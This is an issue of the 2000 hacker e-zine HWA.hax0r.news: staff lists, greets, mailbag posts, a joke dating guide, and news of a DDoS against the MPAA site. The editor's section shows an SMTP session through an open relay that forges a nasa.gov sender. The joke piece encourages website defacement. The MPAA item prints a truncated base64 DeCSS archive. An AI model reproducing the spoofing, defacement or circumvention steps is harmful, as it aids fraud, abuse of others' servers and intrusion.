http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD
** USE NO HOOKS **
Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>
HWA.hax0r.news is now officially sponsored by the following entities:
HWA Internet Security
http://hwa-security.net/
CubeSoft Communications
http://www.csoft.net/
We strongly suggest Csoft for your hosting needs, tell them cruciphux
from HWA sent you. contact julien@csoft,net for details and check the
site for plans available.
Rights of sources included in our newsletter/zine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some sources and agencies impose unfair limitations and restrictions on
the use of their data, I do not generally ask permission to include the
articles from major media or other persons that have published material
on the net, imho this material is public domain.
Example:
"This material is subject to copyright and any unauthorised use, copying or
mirroring is prohibited. "
This notice will be disregarded we don't charge for access to these archives,
if anything we're doing the site(s) a favour by disseminating their news.
Legal action will result in a civil disobedience action and will incur
underground continuance of our zine.
cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@gmx.net......: currently active/programming/IRC+
pyra......................: currently active/crypto queen
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
Armour (armour@bur.st)............: Australia
Wyze1.............................: South Africa
Xistence..........................: German/Dutch translations
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...
@HWA
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
New members/affiliates
Xistence ..... General news and Dutch/German translations
sP|a|Zm ..... Swedish news / translations
SugarKing ..... General news articles
* all the people who sent in cool emails and support
GREETS
~~~~~~
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs*
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
theduece ytcracker loophole BlkOps
MostHated vetesgirl Slash bob-
CHEVY* Debris pr1zm JimJones
Dragos Ruiu pr0xy MR^CHAOS senn
Fuqrag Messiah v00d00 meliksah
dinkee omnihil sP|a|Zm OE
KillNow iPulse erikR prizm
paluka Xistence doobee phold hi ;)
{} mixter merXor abattis
ashie diesl0w aus Julien/Csoft
b0f chappies DoK chappies and our HWA clan
DISSES?
~~~~~~~
You get the biggest dis of them all, your name(s) will not
even be mentioned here in the zine, you are nothing. You
know who you are, deal and squeal.
EoF
shouts to Xochitl13 for sending the cool postcard with a pic
of the la 2600 meeting place. cheers dude! btw your mailbox
is full ...
Folks from #hwa.hax0r,news and other leet secret channels,
*grin* - mad props! ... ;-)
And many others, sorry if i missed you or forgot you! mail
me and i'll flail myself unforgivingly in front of my open
bedroom window until I bleed, then maybe, add u to the list
(please, don't ask for pics...)
Also mad props to doobee and the CCC (Chaos Computer Club)
in Germany for setting up a new listserv system to help
distribute the zine. (Will be in action soon, I have admin
work to do first and testruns..).
:-)))
Ken Williams/tattooman ex-of PacketStorm,
SpaceRogue for running a kick ass news net
Emmanuel Goldstein for pure staying power
All the crackers, hackers and phreakers
The sysadmins, NOC controllers, network engineers
IRCops, security professionals, tiger team operatives
military cyberwar grunts, feds and 'special computer
unit' coppers trying to keep shit together in this
anarchic chaos.
AND
Kevin Mitnick (free at last, stay free this time man...)
Kevin was released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/
not familiar with his story? you should be, it affects us all
especially if you're in the U.S
-=-
kewl sites: Updated May/Jun 2000
Placement on list has no bearing of how "kewl" the sites are. :-p
+ http://hackdesk.dhs.org/
+ http://www.hack.co.za/ ** may be up, may be down... **
+ http://blacksun.box.sk/
+ http://packetstorm.securify.com/
+ http://www.securityportal.com/
+ http://www.securityfocus.com/
+ http://www.hackcanada.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://www.pure-security.net/
+ http://ech0.cjb.net/
+ http://www.r00tabega.com/
+ http://eeye.com/
+ http://ussrback.com/
+ http://el8.org/
+ http://adm.freelsd.net/
+ http://www.l0pht.com/
+ http://www.2600.com/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
Since we provide only the links in this section, be prepared
for 404's - Ed
+++ When was the last time you backed up your important data?
++ www.hack.co.za is back online (see elsewhere for story on gov-boi
and a tassle with phonic) (June 2000)
#darknet is current 'official' hack.co.za public IRC channel
it is generally open on EFnet, but sometimes closed due to
attacks from lamers with nothing better to do than disrupt IRC,
Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*** NEW WEB BOARD! ***
========================================================================
The message board has been REVIVED with a new script and is doing quite
well. Check it out
http://discserver.snap.com/Indices/103991.html
.
Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed
=======================================================================
* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~
(Didn't pull much from the board, check it out, some interesting
stuff on there... - Ed)
rst-: drskru@gmx.net
New Group SKRU for YOU!
Sun May 21 17:27:36 2000
New group now recruiting!
Fun hax0r group :)) must have a sense of humour
will skewl.
http://skru2k.tripod.com/skru/
EFnet
#Script-Kids-R-Us
:-)
See ya there, keep up the cool zine! bye....
-=-
note: this group has defaced several sites and mirrors can be seen
on Attrition.org, also channel is keyed. - Ed
-=-
A little late unfortunately but for your ref; - Ed
Lucian: lucjam@mindspring.com
TV film on script kiddies
Wed May 17 15:26:27 2000
Hi HWA,
Am working on a big new film about kid hackers / crackers / script kiddies
for British TV. Treating them not as anti-corporate heroes, or geniuses,
but as willful, cat burgling pranksters.
I need to find some contacts for hackers (and their admirers!) before the
end of this week...
This isn't some lame documentary exposing people, this is a cool story,
not a news expose, happy for anyone to be anonymous,
Am on to all the usual suspects, but any new stories leads would be really
appreciated.
thanks
Lucian
-=-
Unfortunately I didn't respond to this fella, I wonder who the 'usual
suspects' were ... hrm - Ed
-=-
SugarKing: sugarking2001@hotmail.com
2600 going too far?
Mon May 8 11:04:30 2000
2600 registers verizonREALLYsucks.com going after Verizon Wireless.
And before this fucknbc.com ? What are they trying to prove? Anyone
have anything to say about this? I'm thinking of writing and article
about it...give me some feedback.
SugarKing
-=-
allnet33
2600 going to far
Tue Jun 6 22:23:45 2000
I think 2600 is trying to challenge corporate america
every chance they get. They want to cause political
trouble just to keep things stirred up so that they
have something to write about.
-=-
Check board for other threads. Open up a convo...
@HWA
02.0 Words from the editor.
~~~~~~~~~~~~~~~~~~~~~
_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/* Its mostly been said in the two listbot mailing list news
* announcement msgs, however i'd like to point out that some
* items may fall outside the stated coverage period due to
* threading, these were left for clarity.
*
* I'd like to thank staff members and especially Pyra and
* Merxor, SugarKing, TP for their great help in getting this
* issue and #54 into shape, thanks guys!
*
* Also thanks to {}, JimJones, Slash and Prizm for other
* help and direction. *wink wink*
*
* Cruci-
*
* cruciphux@dok.org
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Anonymous email:
telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied
or
550 admin@nasa.gov... Domain must exist
etc.
* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)
-=-
Recent public posts to listbot mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Jun 13 2000 21:25:48 EDT
From: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Subject: NEWS: HWA.hax0r.news is ALIVE!
Hi folks;
My apologies for the delay this time around, personal problems
and other work commitments have kept me from my hobby. This is
being remedied and things should pick up from here on in as we
get organized.
Here is some news for you.
HWA-security.net has been registered and will be hosted by our
good friends at Csoft (cheers Julien), check www.csoft.net for
your hosting/vhost needs. They know their shiat. Site us under
development and will be online soon.
Once again we're looking for new staff members or volunteers
to act as reporters, interviewers, news gatherers, file finders
etc. More details in release #53 which will be released this weekend
June 18th.
---> Email me at cruciphux@dok.org
** Issue #53 will be released June 18th and will cover material and
submissions from April 9th thru May 7th 2000.
** Issue #54 MAY be out this weekend also but I doubt it..we'll see
how busy things get around here, #54 will contain the recent news
and cover May 7th to present (release date). I will try my best to
get #53 and #54 out close to each others release dates, i'm doing it
this way to maintain coverage period per issue number.
<contd next message>
From: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Subject: NEWS part 2: HWA.hax0r.news
HWA.hax0r.news - http://welcome.to/HWA.hax0r.news/
Hi again,
<cont'd part 2 of 2>
We appreciate your staying with us and giving us support, although
I'm largely doing this for selfish reasons and fun it is nice to
hear others getting off on it too, I've decided to expand operations
and offer more to the community.
I've decided to become more organized and have taken on a staff to
help with the production of the zine with an eye to keeping a more
timely release date and more reliable/quality production. If you
can help send me an email with a mini resume listing your talents
and areas you would be interested helping in.
** This is a non-profit venture. Sponsored by CUBESOFT. **
Yes we're doing it all for fun, like the old days :)
Many areas are open for you to offer help, think of this as a
fresh startup, what is it? a cross between Securityfocus, HNN
PacketStorm and the like. Sponsors are welcome, your donations
or ads will be redirected into the development of this project.
HWA-Security.net - Web site development, design, CGI, forums
programming, administration, forum admin, mailing list admin
PHP programming, java to proofreading and data collection.
Email me at cruciphux@dok.org with what you think you can do to
help or are interested in becoming a sponsor for this worthwhile
cause.
Mailing Address:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
SPONSORS, Commercial Advertising, Conference.
=============================================
Contact me for product advertising, or sponsorship details/offers
and we can work something out. I don't gouge and am looking to
work towards financing a new Canadian Con. CanCon 99 failed due
to lack of sponsorship/expertise in 1999, if you can help or offer
sponsorship, I want to hear from you.
Cruciphux@dok.org
Talk to us live
===============
Drop off news or just hang and idle or chat, don't forget to join us
on EFNet IRC #HWA.hax0r.news, if channel has a key then ..
/join #hwa.hax0r.news zwen
(key is zwen and if that does not work msg cruciphux i'm usually
online most days.)
Qualifications?
===============
I don't claim to know it all or be a mad skewled expert but am a 35 yr old
"old school" ex-hacker, currently certified Unix Admin, Linux Admin and
Internet Security Specialist... information doesn't necessarily want to be
$7.15
<no offence to Emmanuel/Eric>
Cheers
Cruciphux, (Steve Carpenter)
HWA Editor/Founder, DoK, b0f
b0f security
http://b0f.freebsd.lublin.pl/
=-=
Congrats, thanks, articles, news submissions and kudos to us at the
main address: cruciphux@dok.org complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Hacking your way into a girlie's heart, etc by: ch1ckie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
04/09/00
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-
((Hacking your way into a girlie's heart, etc))-((by: ch1ckie))
->Lesson One: Making Yourself Appear More Elite Than You Actually Are.
-In real life, or on IRC, the most important thing that a girlie looks for in a hax0r is
skill (she hopes it will move her up in the world), whether it is real skill (which is
hard to come by these days) or if its simply an elite host (hax0r@fbi.gov).
-To make yourself appear more elite than you actually are (or ever will be), the first
step is getting yourself an elite host (2845818@shellyeah.org probably won't cut it),
either by means of a shell, wingate, or bnc (and if you don't know of these things, just
tell the girl you admin some big network in your spare time and i'm sure she'll be
impressed).
-In all retrospect, most girlies don't know the difference between _you_ and the real
thing, so don't worry.
-Opposing popular use...to the majority of girlies, it is best not to use leet speak
(eye 4m 4 m45t0r hax0r); this will more often than not end up confusing them and leave
them bewildered. Thus, trying to impress them will prove useless. If you happen to have
a girl that knows 'leet speak', don't directly use this speak with her either, but use
it when she is in the premisis ("y0 m4ng, u b3tt4 ch3ck y0s3lf b4 u wr3ck y0s3lf"). This
will undoubtfully make you appear more elite/phearful than you actually are.
-For those of you who are more 'skilled', deface webpages in the fair name of your
girlie... ("U R 0wned; mad props to my girlie"). This is a concept far beyond most
girlies, and seeing their name on www.yahoo.com proves very impressive.
A few other methods of making yourself appear elite:
-obtaining operator status in as many channels as possible, do whatever you can to do so...
suck dick, kiss ass, or stomp on some heads.
-pinging out her enemies on command will impress/delight her enough to have even cyber sex with
you... might wanna keep that in mind.
-using random 'big' words such as "heuristic control algorithm" or "pleisiochronous
communications" will be sure to impress... they do not even have to be in an order that makes
any sense. As long as your girlie hears 'big important words', she will believe that you are
elite...and the sad part is, that you will probably believe that you are too :(.
*Making yourself appear more elite than you actually are, is the first step to hacking your way
into a girlie's heart. Lesson two and three coming soon ('Making Your Girlie Feel Important',
and 'Understanding Your Girlie').*
[Shouts to my 'elite' gang in ftg ....Debris, nerp, potus, omega44, JimJones, and all the rest.]
"If only i could be as cool as you." - Silverchair
ch1ckie@ EFNet
ch1ckie.cjb.net
ch1ckie@hotmail.com
@HWA
04.0 [HWA] MPAA Site DoS'd off the net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th 2000
By: Cruciphux
Source: Anonymous (one of the persons involved contacted us directly on IRC)
Data: confirmed
http://www.mpaa.org has been down for nine hours or so as I write this
several T1's were employed in a distributed DoS attack against the site
further information will be posted as I get it.
It is also rumoured that many sites affiliated with MPAA such as Tristar
will also be going down over the next week.
Some recent anti-MPAA defacements follow, the first site includes the
full UUencoded source code to DeCSS, (This site was censored by
Attrition for fear or reprimand from the MPAA I believe this is a
first for Attrition in censoring defaced pages. - Ed)
http://www.safemode.org/mirror/2000/04/11/courtavenue_com/
<Screwloose Logo>
... fuck censorship! a focus on MPAA(sic).
You know one thing I am really brassed off about, and it has been going on since
so-called "civilisation" existed. Is how censorship is controling our lives. Governments
control people by the millions through forced relegions, cults, and conspiracies while
ripping us off in the process. Enterprises and Government work hand in hand to
exploit the common people. Enterprises use Governmnet as a tool to uphold
censorship and inevitably generate revenue for them, and likewise for the government
as they reap the taxes in return(that's why the US government won't take their finger
out of their ass, and split up Microsoft and other overbloated monopolies which are
very unethical with their business stratigies). Hmm, I know what your thinking "Isn't
the idea of a 'democratic' government suppose to let the common people control their
government, not the other way around?!?", yeah an your compleately right ....
fascism is still commonplace even today in 1st world countries.
Which brings me to the attention of MPAA(Motion Picture Association of America)
who are trying to control how we watch DVD's, where we watch them, who we watch
them with(does this include pets such as dust mites?!?), and what parts we watch. For
example "Are we allowed to skip their brainwashing advertisments and other shit for
which they want to control us with?". I feel paranoid when I have a friend watching a
DVD with me just incase I am breaking the law. LOL! :/. Where does censorship end?!
It's all DEEPLY psycological you know! MPAA have restrained the right for people to
write drivers for no computer operating system other than Microsoft's very own
"Windows" range, this means that you have to loose your precious uptimes of months
on your unix systems for a few hours of entertainment(hardly seems worth it).
"...and remember all visionaries are fascist bastards!" - ScrewLoose
Shouts go to...
BlazinWeed, phov0s/datawar, and other nigguhs who inspired me.
Here is the DeCSS code
This version of the code is for M$ Windows and is in the form of a ".dll"(dynamic link
library). It can decrypt any information stored on every DVD CD, yes it's the code that
MPAA don't want anyone just to pass it on OR EVEN LINK TO IT!!?!? I am deadly
serious. It makes you think "What are those mother fuckers got to hide?". You could
probably find a uu base64 decoder at davecentral for both Windows and Linux(if your
distribution doesn't come with a version already). See for yourself... . .
N.B.It is advised to rip this code straight from the HTML source to ensure
that it is decoded 100% properly.
------------ CUT HERE (filename = "decss.zip") ------------- begin-base64
644 2 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
